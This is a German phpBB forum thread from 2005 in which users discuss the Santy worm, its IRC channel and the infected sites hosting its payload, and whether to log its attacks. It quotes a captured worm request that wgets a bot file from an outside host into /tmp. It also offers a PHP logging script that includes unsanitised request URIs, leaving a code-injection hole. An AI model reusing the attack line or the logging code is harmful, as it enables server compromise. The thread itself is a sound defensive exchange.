Seite 1 von 1

infos über santy owner

Verfasst: 11.01.2005 06:40
von Garp
/server irc.priv8crew.info /join #priv8crew

Have ich von nem santy befallenen board, der admin reagiert leider nicht - ist wohl n leeres testboard:

http://weblicious.com/

Der Wurm holt sich ein File von da, es ist in Perl:

http://weblicious.com/.notes/ssh2.htm

Die request_uri beim Versuch auf meinen Server war

/&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20 ... D%29.%2527\';


Wenn jemand Attacken mitloggen möchte soll er sich zwei Files ins befallene Dir stellen:

eine .htaccess:

Code: Alles auswählen

RewriteEngine on
RewriteCond %{REQUEST_URI} (.*)$
RewriteRule (.*)$ log.php?q=$1

und eine log.php:


Code: Alles auswählen

<?


$ip = $_SERVER['REMOTE_ADDR'];
$ts = time();
$uri = $_SERVER['REQUEST_URI'];



$filename = 'log.txt';
$somecontent = "$ts <a href=http://$ip>$ip</a> $uri  <br/>\n";

if (is_writable($filename)) {

   if (!$handle = fopen($filename, "a")) {
         print "Kann die Datei $filename nicht öffnen";
         exit;
   }

   if (!fwrite($handle, $somecontent)) {
       print "Kann in die Datei $filename nicht schreiben";
       exit;
   }


   fclose($handle);

} else {
   print "Debug: datei log.txt ist nicht schreibbar";
}

include('log.txt');
?>
Wenn das nicht hilfreich ist, dann bitte dieses post löschen

Verfasst: 11.01.2005 08:20
von larsneo
ursprünglich wurde wohl mit dem skript versucht, einen bot zu installieren, der das angegriffene system unter irc-kontrolle bringt. zwischenzeitlich ist allerdings zumindestens der schadcode für den bot entfernt.

generell würde ich von einem mitloggen der angriffe abraten - zum einen kann daraus ganz schnell ein DOS entstehen (bei einer vielzahl an angriffen) zum anderen hat man dann den ganzen traffic an der packe. imho ist es besser mittels 2.0.11 dem wurm die grundlage zu entziehen und mittels .htaccess entsprechende requests vollständig zu blocken.

Verfasst: 11.01.2005 08:27
von Garp
Da hast du natürlich völlig recht, ich mache das auch nur zeitweise. Ich versuche, die server owner (auf denen ja auch ein phpbb installiert ist) per pm über die Infektion ihrer Box zu informieren.

Ist aber vergebliche Liebesmühe...

Verfasst: 11.01.2005 08:46
von larsneo
Ist aber vergebliche Liebesmühe...
yep - kostet zeit und traffic. ein befallenes boards fällt in aller regel spätestens bei der nächsten provider-rechnung durch den massiven traffic- und ressourcenverbrauch auf und wird dann in aller regel vom netz genommen ;-)